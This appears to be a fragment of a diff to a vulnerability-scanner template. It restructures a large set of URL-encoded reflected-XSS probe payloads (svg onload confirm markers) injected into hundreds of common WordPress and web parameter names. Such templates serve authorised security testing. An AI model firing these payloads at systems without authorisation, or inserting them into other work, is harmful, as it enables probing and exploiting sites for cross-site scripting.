"{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E" - - "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E" - - "{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E" - - "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E" - - "{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E" - - "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E" - - "{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E" - - "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E" - - "{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E" - - "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" + - "{{BaseURL}}/?{{xss_param}}" + + payloads: + xss_param: + - "u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" + - "send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" + - "uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" + - "t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" + - "activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E" + - "rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E" + - "title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E" + - "redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E" + - "edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E" + - "next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E" + - "callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E" + - "name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E" + - "tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E" + - "order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E" + - 